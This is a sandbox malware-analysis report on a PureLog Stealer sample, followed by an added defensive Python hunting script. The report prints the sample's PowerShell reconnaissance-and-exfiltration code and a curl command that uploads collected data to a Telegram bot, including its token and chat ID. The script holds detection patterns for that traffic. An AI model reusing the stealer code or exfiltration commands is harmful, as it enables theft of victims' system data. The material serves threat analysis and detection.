
Windows Analysis Report
n0PDCyrFnf.exe

Overview

General Information

Sample name:n0PDCyrFnf.exe
renamed because original name is a hash value
Original sample name:3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Analysis ID:1502365
MD5:88e5d9d97d0e3c83e74926986d6e5ef6
SHA1:37c8bcfde800dea135577b3254b11c6fe639dc21
SHA256:3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279
Tags:exe

Detection

PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • n0PDCyrFnf.exe (PID: 2588 cmdline: "C:\Users\user\Desktop\n0PDCyrFnf.exe" MD5: 88E5D9D97D0E3C83E74926986D6E5EF6)
    • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7112 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • curl.exe (PID: 2080 cmdline: "C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" -F document=@C:\Users\user\AppData\Local\Temp\database.zip -F chat_id=-1002165480850 https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Yara matches (Source | Rule | Description | Author):
n0PDCyrFnf.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000000.1638451242.0000000000882000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.0.n0PDCyrFnf.exe.880000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
amsi64_2588.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security
Sigma match (Source | Rule | Author | Data):
File created | PSScriptPolicyTest Creation By Uncommon Process | Nasreddine Bencherchali (Nextron Systems) | EventID: 11, Image: C:\Users\user\Desktop\n0PDCyrFnf.exe, ProcessId: 2588, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5f5ahar5.bbo.ps1
          No Suricata rule has matched

          AV Detection

Source: n0PDCyrFnf.exe | Avira: detected
Source: n0PDCyrFnf.exe | Virustotal: Detection: 28%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: n0PDCyrFnf.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: n0PDCyrFnf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    POST /bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessage HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682
    Content-Type: application/json; charset=utf-8
    Host: api.telegram.org
    Content-Length: 438
    Expect: 100-continue
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: unknown | HTTP traffic detected: POST /bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessage HTTP/1.1 (same request and headers as the global traffic entry above)
Source: n0PDCyrFnf.exe, 00000000.00000002.1825821731.000000001C7F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
Source: n0PDCyrFnf.exe, 00000000.00000002.1828937086.00000000226BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoftL
Source: n0PDCyrFnf.exe, 00000000.00000002.1828937086.00000000226BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoftLanguagePackManagement.psd1
Source: n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: n0PDCyrFnf.exe, 00000000.00000002.1828302488.000000002015D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.t.com/pkiops/cersoft%20Time-Stam
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot$token/sendDocument
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot$token/sendMessage
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58
Source: curl.exe, 00000003.00000002.1793058595.000001CC6B8A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792740899.000001CC6B8BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.1793125910.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792902079.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.1793058595.000001CC6B8A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792770937.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792789597.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792855039.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument
Source: curl.exe, 00000003.00000002.1793058595.000001CC6B8A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument-
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument8
Source: curl.exe, 00000003.00000002.1793058595.000001CC6B8A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentC:
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentX
Source: curl.exe, 00000003.00000003.1792740899.000001CC6B8BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.1793125910.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792855039.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument_
Source: curl.exe, 00000003.00000003.1792902079.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792770937.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792789597.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentapi.telegram.
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessageP
Source: n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2

          Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Code function: 0_2_00007FFD9B6B0D48
Source: n0PDCyrFnf.exe | Static PE information: No import functions for PE file found
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs n0PDCyrFnf.exe
Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs n0PDCyrFnf.exe
Source: n0PDCyrFnf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: n0PDCyrFnf.exe, jwyfyp5v6sYM3bcUbO.cs | Cryptographic APIs: 'CreateDecryptor' (4 occurrences)
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/13@2/2
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\n0PDCyrFnf.exe.log
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2080:120:WilError_03
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5f5ahar5.bbo.ps1
Source: n0PDCyrFnf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Anti Malware Scan Interface: captured PowerShell script (the report's capture is truncated at both ends; line breaks restored):
    [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
    $token = "7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag"
    $chatId = "-1002165480850"
    $telegramApiUrl = "https://api.telegram.org/bot$token/sendMessage"
    function Upload_Telegram_Info {
        $osversion = (Get-WmiObject -class Win32_OperatingSystem).Caption
        $uuid = Get-WmiObject -Class Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
        $cpu = Get-WmiObject -Class Win32_Processor | Select-Object -ExpandProperty Name
        $gpu = (Get-WmiObject Win32_VideoController).Name
        $format = " GB"
        $total = Get-CimInstance Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | Foreach {"{0:N2}" -f ([math]::round(($_.Sum / 1GB),2))}
        $raminfo = "$total" + "$format"
        function avinfo {
            $wmiQuery = "SELECT * FROM AntiVirusProduct"
            $AntivirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Query $wmiQuery
            $AntivirusProduct.displayName
        }
        $avlist = avinfo -autosize | ft | out-string
        function Get-Uptime {
            $ts = (Get-Date) - (Get-CimInstance -ClassName Win32_OperatingSystem -ComputerName $computername).LastBootUpTime
            $uptimedata = '{0} days {1} hours {2} minutes {3} seconds' -f $ts.Days, $ts.Hours, $ts.Minutes, $ts.Seconds
            $uptimedata
        }
        $uptime = Get-Uptime
        $username = $env:USERNAME
        $resolution = wmic path Win32_VideoController get VideoModeDescription /format:csv | Select-String -Pattern "\d{3,4} x \d{3,4}" | ForEach-Object { $_.Matches.Value }
        $message = @"
    SYSTEM DATA
    - Antivirus : $avlist
    Hardware:
    - Uptime: $uptime
    - OS: $osversion
    - Screen Size: $resolution
    - CPU: $cpu
    - GPU: $gpu
    - RAM: $raminfo
    - HWID: $uuid
    "@
        $payload = @{
            chat_id = $chatId
            text = $message
            parse_mode = "Markdown"
        }
        $jsonPayload = $payload | ConvertTo-Json -Depth 10
        Invoke-WebRequest -Uri $telegramApiUrl -Method POST -Body $jsonPayload -ContentType "application/json; charset=utf-8" -UseBasicParsing | Out-Null
        $extractor = "$env:LOCALAPPDATA\Temp\database"
        New-Item -ItemType Directory -Path $extractor -Force | out-null
        $env:username > $extractor\username.txt
        $loadedModules = @()
        $processes = Get-Process | Where-Object { $_.ProcessName -notlike "svchost*" }
        foreach ($process in $processes) {
            try {
                $modules = $process.Modules | Select-Object -ExpandProperty FileName
                $modules = $modules | Where-Object { $_ -notmatch "^C:\\WINDOWS\\SYSTEM32" }
                $loadedModules += $modules
            } catch { }
        }
        $loadedModules = $loadedModules | Sort-Object -Unique
        $outputFile = "$extractor\DLLs_in_memory.txt"
        $loadedModules | Out-File -FilePath $outputFile -Encoding UTF8
        Get-WmiObject win32_service | Where-Object State -match "running" | Select-Object Name, DisplayName, PathName, User | Sort-Object Name | Format-Table -wrap -autosize > $extractor\running-services.txt
        Get-WmiObject win32_process | Select-Object Name, Description, ProcessId, Thread
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: n0PDCyrFnf.exe | Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | File read: C:\Users\user\Desktop\n0PDCyrFnf.exe
Source: unknown | Process created: C:\Users\user\Desktop\n0PDCyrFnf.exe "C:\Users\user\Desktop\n0PDCyrFnf.exe"
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Process created: C:\Windows\System32\curl.exe "C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" -F document=@C:\Users\user\AppData\Local\Temp\database.zip -F chat_id=-1002165480850 https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
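Three observations in the behavior above belong together. The process tree contains no powershell.exe, yet the AMSI capture for PID 2588 (the sample itself) is a PowerShell script, the sample writes __PSScriptPolicyTest_5f5ahar5.bbo.ps1 (the file the PowerShell engine drops on start-up, which is what the matched Sigma rule keys on), and the sendMessage request carries a WindowsPowerShell/5.1 User-Agent: the .NET binary is hosting the PowerShell engine in-process, so any detection keyed on a powershell.exe image sees nothing. The reconnaissance and exfiltration, on the other hand, are visible as ordinary children: WMIC.exe querying Win32_VideoController, and curl.exe posting database.zip to the Telegram Bot API with the bot token and chat_id on the command line. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that turns those observations into hunting logic over Sysmon-style EventID 1 (process creation) and EventID 11 (file creation) records. The events, PIDs, bot token and chat_id in it are constructed placeholders modelled on the report, not the real values.

```python
"""Hunting logic for the tradecraft in this report over Sysmon-style records:
EventID 1 (process creation) and EventID 11 (file creation)."""
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Optional

# Telegram Bot API URL as it appears in the curl/Invoke-WebRequest command lines:
# https://api.telegram.org/bot<bot_id>:<secret>/<method>
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)")
CHAT_ID_RE = re.compile(r"chat_id=(-?\d+)")
# WMI classes the captured script reads to build its hardware fingerprint
WMI_HW_CLASSES = ("win32_videocontroller", "win32_physicalmemory",
                  "win32_processor", "win32_computersystem")
# Images that legitimately host the PowerShell engine
PS_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
PS_POLICY_TEST_RE = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_telegram_exfil(ev: dict) -> Optional[Finding]:
    """A bot token in a command line means data is leaving via the Bot API;
    bot_id and chat_id are the IOCs to report to Telegram for takedown."""
    cmd = ev.get("CommandLine", "")
    m = TELEGRAM_BOT_RE.search(cmd)
    if not m:
        return None
    chat = CHAT_ID_RE.search(cmd)
    return Finding("telegram_bot_api_exfil", ev["ProcessId"],
                   f"bot_id={m['bot_id']} method={m['method']} "
                   f"chat_id={chat.group(1) if chat else 'n/a'} secret_len={len(m['secret'])}")


def check_wmic_hw_recon(ev: dict) -> Optional[Finding]:
    """WMIC pulling GPU/RAM/CPU/system classes, as the script does for its
    SYSTEM DATA message; the parent image shows which process drove the query."""
    if image_name(ev.get("Image", "")) != "wmic.exe":
        return None
    cmd = ev.get("CommandLine", "").lower()
    hit = [c for c in WMI_HW_CLASSES if c in cmd]
    if not hit:
        return None
    return Finding("wmic_hardware_recon", ev["ProcessId"],
                   f"classes={','.join(hit)} parent={image_name(ev.get('ParentImage', ''))}")


def check_ps_policy_test(ev: dict) -> Optional[Finding]:
    """Same idea as the matched Sigma rule: the PowerShell engine writes
    __PSScriptPolicyTest_*.ps1 when it starts, so that file coming from an
    image other than a PowerShell host means the engine is hosted in-process."""
    target = ev.get("TargetFilename", "")
    if not PS_POLICY_TEST_RE.search(target):
        return None
    img = image_name(ev.get("Image", ""))
    if img in PS_HOSTS:
        return None
    return Finding("powershell_hosted_in_uncommon_process", ev["ProcessId"],
                   f"image={img} file={image_name(target)}")


CHECKS = {1: (check_telegram_exfil, check_wmic_hw_recon), 11: (check_ps_policy_test,)}


def hunt(events: list[dict]) -> list[Finding]:
    findings = []
    for ev in events:
        for check in CHECKS.get(ev.get("EventID"), ()):
            f = check(ev)
            if f:
                findings.append(f)
    return findings


# Constructed events modelled on the report's process tree. The bot token,
# chat_id and the two benign rows are placeholders, not values from the sample.
SAMPLE_EVENTS = [
    {"EventID": 11, "ProcessId": 2588, "Image": r"C:\Users\user\Desktop\n0PDCyrFnf.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_abc12345.xyz.ps1"},
    {"EventID": 1, "ProcessId": 7112, "Image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "ParentImage": r"C:\Users\user\Desktop\n0PDCyrFnf.exe",
     "CommandLine": r'"C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv'},
    {"EventID": 1, "ProcessId": 2080, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Users\user\Desktop\n0PDCyrFnf.exe",
     "CommandLine": r'"C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" '
                    r'-F document=@C:\Users\user\AppData\Local\Temp\database.zip -F chat_id=-1000000000000 '
                    r'https://api.telegram.org/bot1234567890:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sendDocument'},
    # benign: a real PowerShell host dropping its policy-test file, and an ordinary curl download
    {"EventID": 11, "ProcessId": 4242, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zz99zz99.abc.ps1"},
    {"EventID": 1, "ProcessId": 4343, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\curl.exe" -sSL https://example.com/update.txt'},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

Running the block prints one finding per malicious row and nothing for the two benign rows. The Telegram pattern matches on the Bot API path rather than on curl.exe, so it also fires on an Invoke-WebRequest or wget command line when PowerShell is visible, and the bot_id / chat_id it extracts are exactly what you hand to Telegram for a takedown request. The WMIC check deliberately reports the parent instead of filtering on it: Win32_VideoController queries from an unknown user-profile executable are the signal, the same query from an inventory agent is the noise, and that decision belongs to whoever tunes the rule.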
Source: C:\Users\user\Desktop\n0PDCyrFnf.exe | Sections loaded (in order):
    mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll,
    cryptsp.dll, rsaenh.dll, cryptbase.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, amsi.dll, userenv.dll, wbemcomn.dll,
    napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll,
    napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll,
    napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll,
    napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll,
    gpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll,
    microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll,
    napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, fwpuclnt.dll,
    dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, winhttp.dll, ondemandconnroutehelper.dll, fwpuclnt.dll,
    schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll,
    napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, kdscli.dll
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
